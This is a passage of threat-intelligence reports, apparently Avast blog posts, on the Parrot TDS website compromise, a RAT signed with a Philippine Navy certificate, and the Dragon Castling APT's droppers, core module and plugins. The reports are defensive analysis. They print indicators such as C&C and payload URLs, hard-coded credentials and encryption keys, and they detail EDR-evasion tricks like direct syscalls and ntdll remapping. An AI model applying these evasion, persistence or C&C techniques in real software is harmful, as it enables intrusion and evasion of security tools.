A new Traffic Direction System (TDS) we are calling Parrot TDS, using tens of thousands of compromised websites, has emerged in recent months and is reaching users from around the world. The TDS has infected various web servers hosting more than 16,500 websites, ranging from adult content sites and personal websites to university and local government sites.
Parrot TDS acts as a gateway for further malicious campaigns to reach potential victims. In this particular case, the infected sites’ appearances are altered by a campaign called FakeUpdate (also known as SocGholish), which uses JavaScript to display fake notices for users to update their browser, offering an update file for download. The file observed being delivered to victims is a remote access tool.
The newly discovered TDS is, in some aspects, similar to the Prometheus TDS that appeared in the spring of 2021 [1]. However, what makes Parrot TDS unique is its robustness and its huge reach, giving it the potential to infect millions of users. We identified increased activity of the Parrot TDS in February 2022 by detecting suspicious JavaScript files on compromised web servers. We analysed its behaviour and identified several versions, as well as several types of campaigns using Parrot TDS. Based on the appearance of the first samples and the registration date of the Command and Control (C2) domains it uses, Parrot TDS has been active since October 2021.
One of the main things that distinguishes Parrot TDS from other TDSes is how widespread it is and how many potential victims it has. The compromised websites we found appear to have nothing in common apart from being hosted on servers running poorly secured CMSes, such as WordPress. From March 1, 2022 to March 29, 2022, we protected more than 600,000 unique users around the globe from visiting these infected sites. In this time frame, we protected the most users in Brazil (more than 73,000 unique users), followed by India (nearly 55,000) and the US (more than 31,000).
Compromised Websites
In February 2022, we identified a significant increase in the number of websites that contained malicious JavaScript code. This code was appended to the end of almost all JavaScript on the compromised web servers we discovered. Over time, we identified two versions (proxied and direct) of what we are calling Parrot TDS.
In both cases, web servers with different content management systems (CMS) were compromised. WordPress, in various versions including the latest, and Joomla were the most commonly affected. Since the compromised web servers have nothing in common, we assume the attackers took advantage of poorly secured servers with weak login credentials to gain admin access, but we do not have enough information to confirm this theory.
Proxied Version
The proxied version communicates with the TDS infrastructure via a malicious PHP script, usually located on the same web server, and executes the response content. A deobfuscated code snippet of the proxied version is shown below.
This code performs basic user filtering based on the User-Agent string, cookies and referrer. In short, it contacts the TDS only once for each user who visits the infected page. This filtering prevents repeated requests and possible server overload.
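As a sketch, the one-visit filtering described above can be modelled as follows. The cookie name, the bot User-Agent patterns and the referrer check are illustrative assumptions based on the behaviour described, not values lifted from the actual script:

```python
import re

# The TDS response sets the __utma cookie on processed clients (see the
# campaign section below); its presence marks visitors already handled.
SEEN_COOKIE = "__utma"

# Illustrative User-Agent substrings a TDS might filter out (assumption).
BOT_PATTERN = re.compile(r"(bot|crawler|spider|curl|wget)", re.IGNORECASE)

def should_contact_tds(user_agent, cookies, referrer):
    """Approximate the client-side filtering: contact the TDS only once
    per visitor and skip obvious crawlers and direct visits."""
    if SEEN_COOKIE in cookies:          # this visitor was already processed
        return False
    if BOT_PATTERN.search(user_agent):  # skip crawlers and tooling
        return False
    if not referrer:                    # skip direct visits (assumption)
        return False
    return True
```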
The aforementioned PHP script serves two purposes. The first is to extract client information (IP address, referrer and cookies), forward the request from the victim to the Parrot TDS C2 server and relay the response back.
The second functionality allows an attacker to perform arbitrary code execution on the web server by sending a specially crafted request, effectively creating a backdoor. The PHP script uses different names and locations, but usually its name corresponds to the name of the folder it is in (hence the name of the TDS, since it parrots the names of folders).
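The "parroting" naming pattern lends itself to a simple triage heuristic. The sketch below is a defender-side check we are suggesting, not the attackers' code; the .php extension assumption follows from the backdoor being a PHP script:

```python
from pathlib import Path

def parrots_folder_name(script_path):
    """Flag PHP scripts whose base name matches the name of the folder
    they live in, i.e. the "parroting" pattern described above."""
    p = Path(script_path)
    return p.suffix == ".php" and p.stem == p.parent.name
```

A hit is only a lead for manual review, since legitimate sites can also contain such files by coincidence.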
In several cases, we also identified a traditional web shell on the infected web servers, which was located in various locations under different names but still following the same “parroting” pattern. This web shell likely allowed the attacker more comfortable access to the server, while the backdoor in the PHP script mentioned above was used as a backup option. An example of a web shell identified on one of the compromised web servers is shown below.
Since we have seen several cases of reinfection, it is highly likely that the server automatically restores possibly deleted files using, for example, a cron job. However, we do not have enough information to confirm this theory.
Direct Version
The direct version is almost identical to the previous one. This version utilises the same filtering technique. However, it sends the request directly to the TDS C2 server and, unlike the previous version, omits the malicious backdoor PHP script. It executes the content of the response the same way as the previous version. The whole communication sequence of both versions is depicted below. We experimentally verified that the TDS redirects from one IP address only once.
Identified Campaigns
The Parrot TDS response is JavaScript code that is executed on the client. In general, this code can be arbitrary and exposes clients to further danger. However, in practice, we have seen only two types of responses. The first, shown below, is simply setting the __utma cookie on the client. This happens when the client should not be redirected to the landing page. Due to the cookie-based user filtering mentioned above, this step effectively prevents repeated requests on Parrot TDS C2 servers in the future.
The next code snippet shows the second type, which is a campaign redirection targeting Windows machines.
FakeUpdate Campaign
The most prevalent “customer” of Parrot TDS we saw in the wild was the FakeUpdate campaign. The previous version of this campaign was described by Malwarebytes Labs in 2018 [2]. Although the version we identified slightly differs from the 2018 version, the core remains the same. The user receives JavaScript that changes the appearance of the page and tries to force the user to download malicious code. An example of what such a page looks like is shown below.
This JavaScript also contains a Base64 encoded ZIP file with one malicious JavaScript file inside. Once the user downloads the ZIP file and executes the JavaScript it contains, the code starts fingerprinting the client in several stages and then delivers the final payload.
User Filtering
The entire infection chain is set up so that it is complicated to replicate and, therefore, to investigate. Parrot TDS provides the first layer of defence, which filters users based on IP address, User-Agent and referrer.
The FakeUpdate campaign provides the second layer of defence, using several mechanisms. The first is using unique URLs that deliver malicious content to only one specific user.
The last defence mechanism is scanning the user’s PC. This scan is performed by several JavaScript routines sent by the FakeUpdate C2 server to the user, and it harvests the following information:
Name of the PC
User name
Domain name
Manufacturer
Model
BIOS version
Antivirus and antispyware products
MAC address
List of processes
OS version
An overview of the process is shown in the picture below. The first part represents the Parrot TDS filtering based on the IP address, referrer and cookies, and after the user successfully passes these tests, the FakeUpdate page appears. The second part represents the FakeUpdate filtering based on a scan of the victim’s device.
Final Payload
The final payload is then delivered in two phases. In the first phase, a PowerShell script is dropped and run by the malicious JavaScript code. This PowerShell script is downloaded to a temporary folder under a seemingly random eight-character name (e.g. %Temp%\1c017f89.ps1); the name, however, is hardcoded in the JavaScript code. The content of this script is usually a simple whoami /all command, and the result is sent back to the C2 server.
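Based on the single observed sample name, the dropped script can be matched with a simple pattern. The eight-lowercase-hex-characters format is our assumption derived from the one example above (1c017f89.ps1), not a documented naming scheme:

```python
import re

# Assumed format of the dropped PowerShell script name, generalized from
# the observed sample %Temp%\1c017f89.ps1: eight lowercase hex characters.
PS1_NAME = re.compile(r"^[0-9a-f]{8}\.ps1$")

def looks_like_dropped_script(filename):
    """Return True if a filename matches the assumed dropper pattern."""
    return bool(PS1_NAME.match(filename))
```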
In the second phase, the final payload is delivered. This payload is downloaded to the AppData\Roaming folder. Here, a folder with a random name containing several files is dropped. The payloads we have observed so far are part of the NetSupport Client remote access tool and allow the attacker to gain easy access to the compromised machines [3].
The RAT is commonly named ctfmon.exe (mimicking the name of a legitimate program). It is also automatically started when the computer is switched on via an HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry key.
The installed NetSupport Manager tool is configured so that the user has very little chance of noticing it and, at the same time, gives the attacker maximum opportunities. The tool essentially gives the attacker full access to the victim’s machine. To run unnoticed, the chat functions are disabled and the silent option is set, for example. A gateway is also set up that allows the attacker to connect to the client from anywhere in the world. So far, we’ve seen Chinese domains used as gateways in the tool’s configuration files. The picture below shows the client settings.
Phishing
We identified several infected servers hosting phishing sites. These phishing sites, imitating, for example, a Microsoft Office login page, were hosted on compromised servers in the form of PHP scripts. The figure below shows the aforementioned Microsoft phishing page observed on an otherwise legitimate site. We don’t have enough information to attribute this to Parrot TDS directly; however, a significant number of the compromised servers hosted phishing pages as well.
Conclusion and Recommendation
We have identified an extensive infrastructure of compromised web servers that served as a TDS and put a large number of users at risk. Given that the attacker had almost unlimited access to tens of thousands of web servers, the above list of campaigns is undoubtedly not exhaustive.
The Avast Threat Labs has several recommendations for developers to help prevent their servers from being compromised:
Scan all files on the web server with Avast Antivirus.
Replace all JavaScript and PHP files on the web server with original ones.
Use the latest CMS version.
Use the latest versions of installed plugins.
Check for automatically running tasks on the web server (for example, cron jobs).
Check and set up secure credentials. Make sure to always use unique credentials for every service.
Check the administrator accounts on the server. Make sure each of them belongs to you and has a strong password.
When applicable, set up 2FA for all the web server admin accounts.
Use some of the available security plugins (WordPress, Joomla).
* In an attempt to prevent further attacks on the infected servers, we are providing this hash on demand. Please DM us on Twitter or reach out to us at [email protected].
The Avast Threat Intelligence Team has found a remote access tool (RAT) actively being used in the wild in the Philippines that uses what appears to be a compromised digital certificate belonging to the Philippine Navy. This certificate is now expired, but we see evidence it was in use with this malware in June 2020.
Based on our research, we believe with a high level of confidence that the threat actor had access to the private key belonging to the certificate.
Because this is being used in active attacks now, we are releasing our findings immediately so organizations can take steps to better protect themselves. We have found that this sample is now available on VirusTotal.
Compromised Expired Philippine Navy Digital Certificate
In our analysis we found the sample connects to dost[.]igov-service[.]net:8443 using TLS in a statically linked OpenSSL library.
A WHOIS lookup on the C&C domain gave us the following:
The digital certificate was pinned so that the malware requires the certificate to communicate.
When we checked the digital certificate used for the TLS channel we found the following information:
Some important things to note:
The certificate is a valid certificate with a subject of *.navy.mil.ph, the Philippine Navy.
The certificate has recently expired: it was valid for one year, from Sunday December 15, 2019 until Tuesday December 15, 2020.
Based on our research, we believe with a high level of confidence that the threat actor had access to the private key belonging to the certificate.
While the digital certificate is now expired we see evidence it was in use with this malware in June 2020.
The malicious PE file was found with filename: C:\Windows\System32\wlbsctrl.dll and its hash is: 85FA43C3F84B31FBE34BF078AF5A614612D32282D7B14523610A13944AADAACB.
In analyzing that malicious PE file itself, we found that the compilation timestamp is wrong or was edited. Specifically, the TimeDateStamp of the PE file was modified and set to the year 2004 in both the PE header and Debug Directory as shown below:
However, we found that the author used OpenSSL 1.1.1g and compiled it on April 21, 2020 as shown below:
The username of the author was probably udste. This can be seen in the debug information left inside the used OpenSSL library.
We found that the malware supported the following commands:
run shellcode
read file
write file
cancel data transfer
list drives
rename a file
delete a file
list directory content
Some additional items of note regarding the malicious PE file:
All configuration strings in the malware are encrypted using AES-CBC, with the exception of the mutex it uses. That mutex is used as-is, without decryption: t7As7y9I6EGwJOQkJz1oRvPUFx1CJTsjzgDlm0CxIa4=.
When this string is decrypted using the hard-coded key, it decrypts to QSR_MUTEX_zGKwWAejTD9sDitYcK. We suspect this is a failed attempt to disguise this malware as the infamous Quasar RAT: the disguise cannot hold, because this sample is written in C++ while the Quasar RAT is written in C#.
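We cannot reproduce the decryption here without the sample's hard-coded key, but the mutex string's structure can at least be sanity-checked: once Base64-decoded, an AES-CBC ciphertext must be a whole number of 16-byte blocks. This is a verification sketch, not the malware's routine:

```python
import base64

# The encrypted mutex string observed in the sample.
MUTEX = "t7As7y9I6EGwJOQkJz1oRvPUFx1CJTsjzgDlm0CxIa4="

def aes_cbc_ciphertext_plausible(b64):
    """Check that a Base64 string decodes to a non-empty buffer whose
    length is a multiple of the AES block size (16 bytes), as required
    for an AES-CBC ciphertext."""
    raw = base64.b64decode(b64)
    return len(raw) > 0 and len(raw) % 16 == 0
```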
Avast customers are protected against this malware.
We recently discovered an APT campaign we are calling Operation Dragon Castling. The campaign is targeting what appears to be betting companies in South East Asia, more specifically companies located in Taiwan, the Philippines, and Hong Kong. With moderate confidence, we can attribute the campaign to a Chinese speaking APT group, but unfortunately cannot attribute the attack to a specific group and are not sure what the attackers are after.
We found notable code similarity between one of the modules used by this APT group (the MulCom backdoor) and the FFRat samples described by the BlackBerry Cylance Threat Research Team in their 2017 report and by Palo Alto Networks in their 2015 report. Based on this, we suspect that the FFRat codebase is being shared between several Chinese adversary groups. Unfortunately, this is not sufficient for attribution, as FFRat itself was never reliably attributed.
In this blogpost we will describe the malware used in these attacks and the backdoor planted by the APT group, as well as other malicious files used to gain persistence and access to the infected machines. We will also discuss the two infection vectors we saw being used to deliver the malware: an infected installer and exploitation of a vulnerable legitimate application, WPS Office.
We identified a new vulnerability (CVE-2022-24934) in the WPS Office updater wpsupdate.exe, which we suspect the attackers abused.
We would like to thank Taiwan’s TeamT5 for providing us with IoCs related to the infection vector.
Infrastructure and toolset
In the diagram above, we describe the relations between the malicious files. Some of the relations might not be accurate, e.g. we are not entirely sure if the MulCom backdoor is loaded by the CorePlugin. However, we strongly believe that it is one of the malicious files used in this campaign.
Infection Vector
We’ve seen multiple infection vectors used in this campaign. Among others, an attacker sent an email with an infected installer to the support team of one of the targeted companies, asking them to check for a bug in their software. In this post, we are going to describe another vector we’ve seen: a fake WPS Office update package. We suspect an attacker exploited a bug in the WPS updater wpsupdate.exe, which is part of the WPS Office installation package. We contacted the WPS Office team about the vulnerability we discovered (CVE-2022-24934), and it has since been fixed.
During our investigation we saw suspicious behavior in the WPS updater process. When analyzing the binary we discovered a potential security issue that allows an attacker to use the updater to communicate with a server controlled by the attacker to perform actions on the victim’s system, including downloading and running arbitrary executables. To exploit the vulnerability, a registry key under HKEY_CURRENT_USER needs to be modified, and by doing this an attacker gains persistence on the system and control over the update process. In the case we analyzed, the malicious binary was downloaded from the domain update.wps[.]cn, which is a domain belonging to Kingsoft, but the serving IP (103.140.187.16) has no relationship to the company, so we assume that it is a fake update server used by the attackers. The downloaded binary (setup_CN_2052_11.1.0.8830_PersonalDownload_Triale.exe - B9BEA7D1822D9996E0F04CB5BF5103C48828C5121B82E3EB9860E7C4577E2954) drops two files for sideloading: a signed QMSpeedupRocketTrayInjectHelper64.exe - Tencent Technology (a3f3bc958107258b3aa6e9e959377dfa607534cc6a426ee8ae193b463483c341) and a malicious DLL QMSpeedupRocketTrayStub64.dll.
The first stage is a backdoor communicating with a C&C (mirrors.centos.8788912[.]com). Before contacting the C&C server, the backdoor performs several preparational operations. It hooks three functions: GetProcAddress, FreeLibrary, LdrUnloadDll. To get the C&C domain, it maps itself to the memory and reads data starting at the offset 1064 from the end. The domain name is not encrypted in any way and is stored as a wide string in clear text in the binary.
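The domain-recovery logic can be sketched as follows. The fixed offset of 1064 bytes from the end of the image and the cleartext wide string come from the analysis above; the NUL-termination handling is our assumption:

```python
TAIL_OFFSET = 1064  # offset from the end of the mapped image, per the analysis

def read_cc_domain(image, tail_offset=TAIL_OFFSET):
    """Read the cleartext UTF-16LE (wide string) C&C domain stored
    tail_offset bytes before the end of the binary."""
    chunk = image[len(image) - tail_offset:]
    # Assume the wide string is NUL-terminated: cut at the first 2-byte NUL.
    end = chunk.find(b"\x00\x00")
    if end % 2:          # keep the cut aligned to 2-byte code units
        end += 1
    return chunk[:end].decode("utf-16-le")
```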
Then it initializes an object for a JScript class with the named item ScriptHelper. The dropper uses the ImpersonateLoggedOnUser API call to re-use a token from explorer.exe, so it effectively runs under the same user. Additionally, it uses RegOverridePredefKey to redirect the current HKEY_CURRENT_USER to the HKEY_CURRENT_USER of the impersonated user. For communication with the C&C, it constructs a User-Agent string with some system information, e.g. Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1;.NET CLR 2.0). The information that is exfiltrated is: Internet Explorer version, Windows version, and the value of the “User Agent\Post Platform” registry values.
After that, the sample constructs JScript code to execute. The header of the code contains definitions of two variables: server with the C&C domain name and a hardcoded key. Then it sends the HTTP GET request to /api/connect, the response should be encrypted JScript code that is decrypted, appended to the constructed header and executed using the JScript class created previously.
At the time of analysis, the C&C was not responding, but from the telemetry data we can conclude that it was downloading the next stage from hxxp://mirrors.centos.8788912.com/upload/ea76ad28a3916f52a748a4f475700987.exe to %ProgramData%\icbc_logtmp.exe and executing it.
The second dropper is a runner that, when executed, tries to escalate privileges via the COM Session Moniker Privilege Escalation (MS17-012), then drops a few binaries, which are stored with the following resource IDs:
Resource ID | Filename          | Description
1825        | smcache.dat       | List of C&C domains
1832        | log.dll           | Loader (CoreX) 64bit
1840        | bdservicehost.exe | Signed PE for sideloading 64bit
1841        | N/A               | Filenames for sideloading
1817        | inst.dat          | Working path
1816        | hostcfg.dat       | Used in the Host header, in C&C communication
1833        | bdservicehost.exe | Signed PE for sideloading 32bit – N/A
1831        | log.dll           | Loader (32bit) – N/A
The encrypted payloads have the following structure:
The encryption key is a wide string starting from offset 0x8. The encrypted data starts at the offset 0x528. To decrypt the data, a SHA256 hash of the key is created using CryptHashData API, and is then used with a hard-coded IV 0123456789abcde to decrypt the data using CryptDecrypt API with the AES256 algorithm. After that, the decrypted data is decompressed with RtlDecompressBuffer. To verify that the decryption went well, the CRC32 of the data is computed and compared to the value at the offset 0x4 of the original resource data. When all the payloads are dropped to the disk, bdservicehost.exe is executed to run the next stage.
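The resource layout described above can be sketched as follows. The AES-256-CBC decryption and the RtlDecompressBuffer step are omitted to keep the sketch standard-library only; the offsets and the CRC32 check follow the description, while the exact extent of the key bytes fed to CryptHashData is our assumption:

```python
import hashlib
import zlib

CRC_OFFSET = 0x4      # CRC32 of the decrypted, decompressed payload
KEY_OFFSET = 0x8      # NUL-terminated wide-string key starts here
DATA_OFFSET = 0x528   # encrypted payload starts here

def parse_resource(resource):
    """Split a dropped resource into (aes_key, expected_crc, ciphertext)
    following the layout above. The AES key is the SHA256 hash of the
    wide-string key, mirroring the CryptHashData step."""
    expected_crc = int.from_bytes(resource[CRC_OFFSET:CRC_OFFSET + 4], "little")
    raw = resource[KEY_OFFSET:DATA_OFFSET]
    key_ws = raw[:raw.find(b"\x00\x00") + 1]   # cut at the wide NUL (assumption)
    aes_key = hashlib.sha256(key_ws).digest()
    return aes_key, expected_crc, resource[DATA_OFFSET:]

def crc_matches(plaintext, expected_crc):
    """Verify the decrypted data the way the dropper does."""
    return zlib.crc32(plaintext) == expected_crc
```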
The Loader (CoreX) DLL is sideloaded during the previous stage (Dropper 2) and acts as a dropper. Similarly to Dropper 1, it hooks the GetProcAddress and FreeLibrary API functions. These hooks execute the main code of this library. The main code first checks whether it was loaded by regsvr32.exe and then it retrieves encrypted data from its resources. This data is dropped into the same folder as syscfg.dat. The file is then loaded and decrypted using AES-256 with the following options for setup:
Key is the computer name and IV is qwertyui12345678
AES-256 setup parameters are embedded in the resource in the format <key>#<IV>; for example, you may see cbfc2vyuzckloknf#8o3yfn0uee429m8d
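Parsing the embedded setup string is straightforward; this helper is an illustrative sketch of the <key>#<IV> split described above, with the function name being ours:

```python
def parse_aes_setup(blob):
    """Split the embedded AES-256 setup string of the form <key>#<IV>
    into its two components."""
    key, _, iv = blob.partition("#")
    return key, iv
```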
The main code continues to check if the process ekrn.exe is running. ekrn.exe is an ESET Kernel service. If the ESET Kernel service is running, it will try to remap ntdll.dll. We assume that this is used to bypass ntdll.dll hooking.
After a service check, it will decompress and execute shellcode, which in turn loads a DLL with the next stage. The DLL is stored, unencrypted, as part of the shellcode. The shellcode enumerates exports of ntdll.dll and builds an array with hashes of names of all Zw* functions (windows native API system calls) then sorts them by their RVA. By doing this, the shellcode exploits the fact that the order of RVAs of Zw* functions equals the order of the corresponding syscalls, so an index of the Zw* function in this array is a syscall number, which can be called using the syscall instruction. Security solutions can therefore be bypassed based on the hooking of the API in userspace. Finally, the embedded core module DLL is loaded and executed.
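The RVA-sorting trick is easy to illustrate: given the names and RVAs of ntdll's Zw* exports, the index of each function in RVA order is its syscall number. The export table below is a toy example, not real ntdll data:

```python
def syscall_numbers(zw_exports):
    """Given (name, rva) pairs for ntdll's Zw* exports, recover syscall
    numbers by sorting on RVA: the position of each function in RVA
    order equals its syscall number, as exploited by the shellcode."""
    ordered = sorted(zw_exports, key=lambda entry: entry[1])
    return {name: index for index, (name, _rva) in enumerate(ordered)}
```

With the numbers recovered, the shellcode can issue syscalls directly and skip any userspace API hooks installed by security products.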
The core module is a single DLL that is responsible for setting up the malware’s working directory, loading configuration files, updating its code, loading plugins, beaconing to C&C servers and waiting for commands.
It has a cascading structure with four steps:
Step 1
The first part is dedicated to initial checks and a few evasion techniques. At first, the core module verifies that the DLL is being run by spdlogd.exe (an executable used for persistence, see below) or that it is not being run by rundll32.exe. If this check fails, the execution terminates. The DLL proceeds by hooking the GetProcAddress and FreeLibrary functions in order to execute the main function, similarly to the previous infection stages.
The malware then creates a new window (named Sample) with a custom callback function. A message with the ID 0x411 is sent to the window via SendMessageW which causes the aforementioned callback to execute the main function. The callback function can also process the 0x412 message ID, even though no specific functionality is tied to it.
Step 2
In the second step, the module tries to self-update, load configuration files and set up its working directory (WD).
Self-update
The malware first looks for a file called new_version.dat – if it exists, its content is loaded into memory, executed in a new thread and a debug string “run code ok” is printed out. We did not come across this file, but based on its name and context, this is most likely a self update functionality.
Load configuration file inst.dat and set up working directory. First, the core module configuration file inst.dat is searched for in the following three locations:
the directory where the core module DLL is located
the directory of the EXE that loaded the core module DLL
C:\ProgramData\
It contains the path to the malware’s working directory in plaintext. If it is not found, a hard-coded directory name is used and the directory is created. The working directory is a location the malware uses to drop or read any files it uses in subsequent execution phases.
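The search order can be sketched as a simple lookup. The function name and signature are ours; only the three locations and their priority come from the analysis:

```python
from pathlib import Path

def find_inst_dat(dll_dir, exe_dir):
    r"""Look for inst.dat in the documented order: next to the core
    module DLL, next to the loading EXE, then C:\ProgramData."""
    for directory in (dll_dir, exe_dir, r"C:\ProgramData"):
        candidate = Path(directory) / "inst.dat"
        if candidate.is_file():
            return candidate
    return None  # the malware falls back to a hard-coded directory name
```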
Load configuration file smcache.dat.
After the working directory is set up, the sample will load the configuration file smcache.dat from it. This file contains the domains, protocols and port numbers used to communicate with C&C servers (details in Step 4) plus a “comment” string. This string is likely used to identify the campaign or individual victims. It is used to create an empty file on the victim’s computer (see below) and it’s also sent as a part of the initial beacon when communicating with C&C servers. We refer to it as the “comment string” because we have seen a few versions of smcache.dat where the content of the string was “the comment string here” and it is also present in another configuration file with the name comment.dat which has the INI file format and contains this string under the key COMMENT.
Create a log file
Right after the sample finds and reads smcache.dat, it creates a file based on the victim’s username and the comment string from smcache.dat. If the comment string is not present, it will use a default hard-coded value (for example M86_99.lck). Based on the extension it could be a log of some sort, but we haven’t seen any part of the malware writing into it so it could just serve as a lockfile. After the file is successfully created, the malware creates a mutex and goes on to the next step.
Step 3
Next, the malware collects information about the infected environment (such as username, DNS and NetBIOS computer names, as well as OS version and architecture) and sets up its internal structures, most notably a list of “call objects”. Call objects are structures, each associated with a particular function and saved into a “dispatcher” structure in a map with hard-coded 4-byte keys. These keys are later used to call the functions based on commands from C&C servers.
The key values (IDs) seem to be structured, where the first three bytes are always the same within a given sample, while the last byte is always the same for a given usage across all the core module samples that we’ve seen. For example, the function that calls the RevertToSelf function is identified by the number 0x20210326 in some versions of the core module that we’ve seen and 0x19181726 in others. This suggests that the first three bytes of the ID number are tied to the core module version, or more likely the infrastructure version, while the last byte is the actual ID of a function.
ID (last byte) | Function description
0x02           | unimplemented function
0x19           | retrieves content of smcache.dat and sends it to the C&C server
0x1A           | writes data to smcache.dat
0x25           | impersonates the logged on user or the explorer.exe process
0x26           | function that calls RevertToSelf
0x31           | receives data and copies it into a newly allocated executable buffer
0x33           | receives core plugin code, drops it on disk and then loads and calls it
0x56           | writes a value into comment.dat
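The ID structure can be expressed as a simple mask; the observation that only the last byte identifies the function while the upper bytes vary per core-module or infrastructure version is taken from the analysis above:

```python
def function_id(call_object_id):
    """Extract the function identifier from a 4-byte call-object key:
    only the last byte is the stable per-function ID."""
    return call_object_id & 0xFF
```

For example, both observed keys for the RevertToSelf handler, 0x20210326 and 0x19181726, reduce to the same function ID 0x26.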
Webdav
While initializing the call objects the core module also tries to connect to the URL hxxps://dav.jianguoyun.com/dav/ with the username 12121jhksdf and password 121121212 by calling WNetAddConnection3W. This address was not responsive at the time of analysis but jianguoyun[.]com is a Chinese file sharing service. Our hypothesis is that this is either a way to get plugin code or an updated version of the core module itself.
Plugins
The core module contains a function that receives a buffer with plugin DLL data, saves it into a file with the name kbg<tick_count>.dat in the malware working directory, loads it into memory and then calls its exported function InitCorePlug. The plugin file on disk is set to be deleted on reboot by calling MoveFileExW with the parameter MOVEFILE_DELAY_UNTIL_REBOOT. For more information about the plugins, see the dedicated Plugins section.
Step 4
In the final step, the malware will iterate over C&C servers contained in the smcache.dat configuration file and will try to reach each one. The structure of the smcache.dat config file is as follows:
The protocol string can have one of nine possible values:
TCP
HTTPS
UDP
DNS
ICMP
HTTPSIPV6
WEB
SSH
HTTP
Depending on the protocol tied to the particular C&C domain, the malware sets up the connection, sends a beacon to the C&C and waits for commands.
In this blogpost, we will mainly focus on the HTTP protocol option as we’ve seen it being used by the attackers.
When using the HTTP protocol, the core module first opens two persistent request handles – one for POST and one for GET requests, both to “/connect”. These handles are tested by sending an empty buffer in the POST request and checking the HTTP status code of the GET request. Following this, the malware sends the initial beacon to the C&C server by calling the InternetWriteFile API with the previously opened POST request handle and reads data from the GET request handle by calling InternetReadFile.
The core module uses the following (mostly hard-coded) HTTP headers:
Accept: */*
x-cid: {<uuid>} – new uuid is generated for each GET/POST request pair
Pragma: no-cache
Cache-control: no-transform
User-Agent: <user_agent> – generated from registry or hard-coded (see below)
Host: <host_value> – C&C server domain or the value from hostcfg.dat (see below)
Connection: Keep-Alive
Content-Length: 4294967295 (max uint, only in the POST request)
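Putting the header list above together, a request header set in the sample's style might be assembled as follows. This is a sketch only: the real module generates one x-cid UUID per GET/POST request pair, while this helper generates one per call for simplicity:

```python
import uuid

def build_headers(host, user_agent, for_post):
    """Assemble the mostly hard-coded header set used for C&C
    communication, per the list above."""
    headers = {
        "Accept": "*/*",
        "x-cid": "{%s}" % uuid.uuid4(),
        "Pragma": "no-cache",
        "Cache-control": "no-transform",
        "User-Agent": user_agent,
        "Host": host,
        "Connection": "Keep-Alive",
    }
    if for_post:
        headers["Content-Length"] = "4294967295"  # max uint32, POST only
    return headers
```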
User-Agent header
The User-Agent string is constructed from the registry the same way as in the Dropper 1 module (including the logged-on user impersonation when accessing registry) or a hard-coded string is used if the registry access fails: “Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)”.
Host header
When setting up this header, the malware looks for either a resource with the ID 1816 or a file called hostcfg.dat if the resource is not found. If the resource or file is found, the content is used as the value in the Host HTTP header for all C&C communication instead of the C&C domain found in smcache.dat. It does not change the actual C&C domain to which the request is made – this suggests the possibility of the C&C server being behind a reverse proxy.
Initial beacon
The first data packet the malware sends to a C&C server contains a base64 encoded LZNT1-compressed buffer, including a newly generated uuid (different from the uuid used in the x-cid header), the victim’s username, OS version and architecture, computer DNS and NetBIOS names and the comment string found in smcache.dat or comment.dat. The value from comment.dat takes precedence if this file exists.
In the core module sample we analyzed, there was actually a typo in the function that reads the value from comment.dat – it looks for the key “COMMNET” instead of “COMMENT”.
After this, the malware enters a loop waiting for commands from the C&C server in the form of the ID value of one of the call objects. Each message sent to the C&C server contains a hard-coded four byte number value with the same structure as the values used as keys in the call-object map. The ID numbers associated with messages sent to C&C servers that we’ve seen are:
ID (last byte) | Usage
0x1B           | message to C&C which contains smcache.dat content
0x24           | message to C&C which contains a debug string
0x2F           | general message to C&C
0x30           | message to C&C, unknown specific purpose
0x32           | message to C&C related to plugins
0x80           | initial beacon to a C&C server
Interesting observations about the protocols, other than the HTTP protocol:
HTTPS does not use persistent request handles
HTTPS uses HTTP GET request with data Base64-encoded in the cookie header to send the initial beacon
HTTPS, TCP and UDP use a custom “magic” header: Magic-Code: hhjjdfgh
General observations on the core module
The core samples we observed often output debug strings via OutputDebugStringA and OutputDebugStringW or by sending them to the C&C server. Examples of debug strings used by the core module are: its filepath at the beginning of execution, “run code ok” after self-update, “In googo” in the hook of GetProcAddress, “recv bomb” and “sent bomb” in the main C&C communicating function, etc.
String obfuscation
We came across samples of the core module with only cleartext strings but also samples with certain strings obfuscated by XORing them with a unique (per sample) hard-coded key.
Even within the samples that contain obfuscated strings, there are many cleartext strings present and there seems to be no logic in deciding which string will be obfuscated and which won’t. For example, most format strings are obfuscated, but important IoCs such as credentials or filenames are not.
To illustrate this: most strings in the function that retrieves a value from the comment.dat file are obfuscated and the call to GetPrivateProfileStringW is dynamically resolved by the GetProcAddress API, but all the strings in the function that writes into the same config file are in cleartext and there is a direct call to WritePrivateProfileStringW.
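The XOR scheme described above is simple to undo once the per-sample key is known. A hedged sketch (the key below is made up for illustration, not taken from a sample):

```python
# Per-sample XOR string obfuscation: each obfuscated string is XORed
# with a hard-coded key repeated over its length.
def xor_deobfuscate(data: bytes, key: bytes) -> bytes:
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

key = b"\x5a\x13\x77"                       # hypothetical per-sample key
blob = xor_deobfuscate(b"COMMENT", key)     # obfuscate...
assert xor_deobfuscate(blob, key) == b"COMMENT"  # ...XOR is its own inverse
```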
Overall, the core module code is quite robust and contains many failsafes and options for different scenarios (for example, the number of possible protocols for C&C communication). However, we probably only saw samples of this malware that are still in active development, as many functions are not yet implemented and only serve as placeholders.
Plugins
In the sections below, we describe the functionality of three plugins used by the Core Module (Proto8) to extend its capabilities.
Core Plugin
This plugin is a DLL binary loaded by the fileless core module (Proto8) as mentioned above. It extends the malware’s functionality by adding methods for managing additional plugins. These additional plugins export the function "GetPlugin" which the core plugin executes.
This part uses the same command ID based calling convention as the core module (see above), adding three new methods:
ID (last byte)   Function description
0x2B             send information about plugin location to the C&C server
0x2C             remove a plugin
0x2A             load a plugin
All plugin binaries used by the core module are stored in the working directory under the name kbg<tick_count>.dat. After the Core Plugin is loaded, it first removes all plugins from the working directory – see the image below.
The DLL we call Zload is an example of a plugin loaded by the Core Plugin. It exports four functions: “GetPlugin”, “Install”, “core_zload” and “zload”. The main functionality of this plugin is setting up persistence, creating a backdoor user account, and concealing itself on the infected system. We will focus on the exported functions zload, core_zload and the default DllMain function, as they contain the most interesting functionality.
Zload (process starter)
This function is fairly simple, its main objective is to execute another binary. It first retrieves the path to the directory where the Zload plugin binary is located (<root_folder>) and creates a new subfolder called "mec" in it. After this it renames and moves three files into it:
